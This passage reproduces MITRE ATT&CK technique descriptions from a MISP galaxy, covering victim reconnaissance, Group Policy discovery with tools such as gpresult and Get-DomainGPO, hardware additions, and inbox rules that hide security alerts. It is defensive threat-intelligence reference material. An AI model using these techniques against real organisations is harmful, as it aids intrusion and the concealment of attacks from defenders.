Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites).[DNS Dumpster] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID afe743a7-56b0-4ad1-bd36-dd50d64802fc which can be used as unique global reference for Network Topology in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.004

Network Trust Dependencies

Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[Pentesting AD Forests] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Internal MISP references

UUID 454be621-ea64-409c-981f-809f1238e21c which can be used as unique global reference for Network Trust Dependencies in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1590.003

Gather Victim Network Information

Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).[WHOIS][DNS Dumpster][Circl Passive DNS] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).

Internal MISP references

UUID 58776ca9-0c54-487f-afcc-e7e5b661bd54 which can be used as unique global reference for Gather Victim Network Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Business Relationships

Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise, Drive-by Compromise, or Trusted Relationship).

Internal MISP references

UUID 9bd53629-fa2c-417d-b937-c575504be5b1 which can be used as unique global reference for Business Relationships in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.002

Determine Physical Locations

Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites or Social Media).[ThreatPost Broadvoice Leak][SEC EDGAR Search] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Phishing or Hardware Additions).

Internal MISP references

UUID d93b51df-014a-4d46-949a-4b8f796e6cca which can be used as unique global reference for Determine Physical Locations in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.001

Identify Business Tempo

Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise or Trusted Relationship).

Internal MISP references

UUID 1f28a8a5-7231-47ad-9943-73b3cc6d05b0 which can be used as unique global reference for Identify Business Tempo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.003

Identify Roles

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing).

Internal MISP references

UUID 63a99eb9-0da7-4286-bfc9-c306a03abf24 which can be used as a unique global reference for Identify Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1591.004

Gather Victim Org Information

Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).[ThreatPost Broadvoice Leak][SEC EDGAR Search] Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing or Trusted Relationship).

Internal MISP references

UUID e55d2e4b-07d8-4c22-b543-c187be320578 which can be used as a unique global reference for Gather Victim Org Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Group Policy Discovery

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend into the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group Policy objects (GPOs) are containers for Group Policy settings made up of files stored within a predictable network path, \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.[TechNet Group Policy Basics][ADSecurity GPO Persistence 2016]

Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.[Microsoft gpresult][Github PowerShell Empire] Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain Policy Modification) for their benefit.

Internal MISP references

UUID d97d754d-92d5-4874-bbfe-5aa4d581f2a8 which can be used as a unique global reference for Group Policy Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE

Hardware Additions

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. Adversary-in-the-Middle), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.[Ossmann Star Feb 2011][Aleks Weapons Nov 2015][Frisk DMA August 2016][McMillan Pwn March 2012]

Internal MISP references

UUID 4557bfb9-b940-49b6-b8be-571979134419 which can be used as a unique global reference for Hardware Additions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Email Hiding Rules

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems.[Microsoft Inbox Rules][MacOS Email Rules][Microsoft New-InboxRule][Microsoft Set-InboxRule]

Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account.

Any user or administrator within the organization (or an adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair or delay the detection that would otherwise occur when a user or defender sees the email content. Malicious rules commonly filter out emails based on keywords (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. [